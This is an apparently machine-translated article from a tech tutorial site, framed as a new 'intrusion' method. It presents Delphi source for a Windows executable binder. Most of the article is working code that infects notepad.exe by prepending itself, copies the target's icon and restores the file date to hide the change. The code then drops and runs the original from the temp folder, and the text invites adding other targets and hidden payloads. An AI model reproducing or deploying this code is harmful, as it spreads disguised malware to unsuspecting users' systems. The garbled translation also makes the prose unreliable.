Home PC Games Linux Windows Database Network Programming Server Mobile  
           
  Home \ Linux \ Alternative methods of intrusion bundled executable file new thinking     - mysqldump MySQL command-line tool (Database)

- jQuery update the content and method of use 3.0 (Programming)

- Getting Started with Linux system to learn: how to install the kernel headers on Linux (Linux)

- Oracle11g build physical standby database (Database)

- Calculate CPU utilization (Linux)

- Ubuntu server 8.04 Firewall Guide (Linux)

- Linux netstat command to get started (Linux)

- Linux Live CD lets your PC is no longer secure (Linux)

- MySQL can not write the data keyword conflicts (Database)

- Linux, modify the fstab file system can not start causing solve one case (Linux)

- IO reference Docker container (Server)

- Linux User Management (Linux)

- To create a problem by the statement date comparison of the difference between MySQL and Oracle (Database)

- CentOS install Java 1.8 (Linux)

- Python script running in the background (Programming)

- Ceph cluster disk is no workaround for the remaining space (Server)

- CentOS build JDK environment (Linux)

- To modify the existing user ID and comments GPG key (Linux)

- Depth understanding of C language (Programming)

- How to install Perl modules from CPAN (Linux)

 
         
  Alternative methods of intrusion bundled executable file new thinking
     
  Add Date : 2016-12-13      
         
         
         
  New function: bundled with other programs, other programs icon icon
The demonstration program does not form, compiled, only 40K, do not run the compressed memory resident
If you add hidden form, together with the search function the executable program, plus the function monitoring system, plus $% # @ * ^ function ...

Program in a few figures to determine:
1 When this program is compiled with Aspack.Exe compressed size is 41472
2 After analysis, the procedures in use Aspack.Exe after compression, the front part of a long 40751 icon, the icon data
Located from a total of 40752 byte after byte 640, there are 81 bytes icon

Bundled with other programs in the process:
40751 bytes before the Program is + the + icon bundle this program the last 81 bytes + are all bundled programs

How to find the location of the icon:
The program's icon is red block a 32 * 32, after the program is compiled, compression, hexadecimal
Loading editing software, look for "999 999" to the string. Later you can program together with other appropriate icon.
Hex Editor Software: Common UltraEdit.
I suspect it has a date limit, a self, there is a hex editor, compare, search function, and continuous improvement, to deal with a few hundred K file No problem:
http://guanbh.top263.net/download/hexedit.exe
}
program exe2;

uses
classes,
Tlhelp32,
windows,
graphics,
ShellAPI,
SysUtils;

{$ R * .RES}
var
lppe: TProcessEntry32;
found: boolean;
handle: THandle;
ProcessStr, ExeName: string;
WinDir: pchar;
const
MySize = 41472; {!! This value should be modified according to the compiler or the compressed file size !!}

procedure copy2 (s: string);
var
s1, s2, IcoStream: TMemoryStream;
File2: TFilestream;
ch: array [0..1] of char;
ss: string;
filetime, fhandle: integer;
l: integer;
File2Icon: Ticon;
begin
If the file does not exist {s}
if FileExists (s) = False then exit;
try
{If the file does not contain icons, do not bundle}
File2Icon: = Ticon.Create;
l: = extracticon (handle, pchar (s), 0);
if l = 0 then
begin
File2Icon.Free;
exit;
end
else
begin
{Extract was tied icon}
File2Icon.Handle: = extracticon (handle, pchar (s), 0);
IcoStream: = TMemoryStream.Create;
File2Icon.SaveToStream (IcoStream);
File2Icon.Free;
end;
{S judgment file has no program header section 2 'MZ'. If so, it said it had merged}
File2: = TFilestream.Create (s, fmopenread);
if File2.Size> MySize then
begin
File2.Position: = MySize;
File2.Read (ch, 2);
ss: = copy (ch, 1,2);
if ss = 'MZ' then
begin
File2.Free;
exit;
end;
end;
File2.Free;
{This document will be consolidated document file s + s = s}
s2: = TMemoryStream.Create;
s2.loadfromfile (ExeName);
s1: = TMemoryStream.Create;
{
Prior to joining the Department of 40751 bytes of the Program
Section 40752 byte total 640 bytes of data icon
!! The following figures 40751,81 want to modify the actual situation !!
}
s1.copyfrom (s2,40751);
{Icon will change to be bundled program icon, the icon size is 766}
IcoStream.Position: = 126;
s1.CopyFrom (IcoStream, 640);
IcoStream.Free;
s2.Position: = 40751 + 640;
{Added to the rear of the Program 81 bytes}
s1.CopyFrom (s2,81);
s2.clear;
s2.loadfromfile (s);
s1.seek (s1.size, soFromBeginning);
{Not} be all bundled programs
s1.copyfrom (s2, s2.size);
s2.free;
{Date} to get the file s
fhandle: = FileOpen (s, fmOpenread);
filetime: = filegetdate (fhandle);
fileclose (fhandle);
s1.SaveToFile (s);
{Date} s recovery file
fhandle: = FileOpen (s, fmOpenwrite);
filesetdate (fhandle, filetime);
fileclose (fhandle);
s1.free;
except end;
end;

procedure CreateFileAndRun;
var
s1, s2: TMemoryStream;
TempDir: pchar;
cmdstr: string;
a: integer;
Begin
s1: = TMemoryStream.Create;
s1.loadfromfile (ExeName);
if s1.Size = MySize then
begin
s1.Free;
exit;
end;
s1.seek (MySize, soFromBeginning);
s2: = TMemoryStream.Create;
s2.copyfrom (s1, s1.Size-MySize);
GetMem (TempDir, 255);
GetTempPath (255, TempDir);
try
{
The files to a temporary directory.
If you do not want to be seen in this catalog released a bunch of files, can be changed to other more hidden directory,
Such as c: \ windows (or winnt) \ d ... (This is what directory you to study study it)
}
s2.SaveToFile (TempDir + '\' + ExtractFileName (ExeName));
except end;
cmdstr: = '';
a: = 1;
while ParamStr (a) < > '' do begin
cmdstr: = cmdstr + ParamStr (a) + '';
inc (a);
end;
{File} to run real programs
winexec (pchar (TempDir + '\' + ExtractFileName (ExeName) + '' + cmdstr), SW_SHOW);
freemem (TempDir);
s2.free;
s1.free;
end;

begin
GetMem (WinDir, 255);
GetWindowsDirectory (WinDir, 255);
ExeName: = ParamStr (0);
handle: = CreateToolhelp32Snapshot (TH32CS_SNAPALL, 0);
found: = Process32First (handle, lppe);
ProcessStr: = '';
while found do
begin
ProcessStr: = ProcessStr + lppe.szExeFile; {list all processes}
found: = Process32Next (handle, lppe);
end;
{If notepad is not running, tied together with it}
if pos (WinDir + '\ notepad.exe', ProcessStr) = 0 then
begin
copy2 (WinDir + '\ notepad.exe');
end;
{Other required documents bundled
if pos (..., ProcessStr) = 0 then
begin
copy2 (...);
end;
...
}
freemem (WinDir);
{
You want to use this program doing something other ...
}
CreateFileAndRun; {release the file and run without parameters}
end.
     
         
         
         
  More:      
 
- Use Observium to monitor your network and servers (Server)
- Linux mention the right notes (Linux)
- Additional SQL Server 5123 database reported error (Database)
- SSH configuration under Linux (Linux)
- How to use the TF / SD card making Exynos 4412 u-boot boot disk in Mac (Linux)
- Linux Network Programming - raw socket Example: sending a UDP packet (Programming)
- 11 you Linux Terminal Command (Linux)
- Hands to teach you to solve Ubuntu error message (Linux)
- Source Analysis: Java object memory allocation (Programming)
- OpenSSL for secure transmission and use of skills of files between Windows and Linux (Linux)
- The callback function used in C ++ (Programming)
- Intel Graphics Installer installation on Ubuntu 15.10 (Linux)
- Linux Shell Scripting Interview Question (Linux)
- Compile Android libwebcore.so error occurs when solving (Programming)
- Implement Oracle dynamic registration of non-standard port 1521 (Database)
- To install Docker under CentOS7 (Linux)
- Ubuntu 14.04 compile, install, configure, the latest development version GoldenDict (Linux)
- Sniffer Linux Environment (Linux)
- Use Nginx as a load balancer (Server)
- Command line tool Tmux (Linux)
     
           
     
  CopyRight 2002-2020 newfreesoft.com, All Rights Reserved.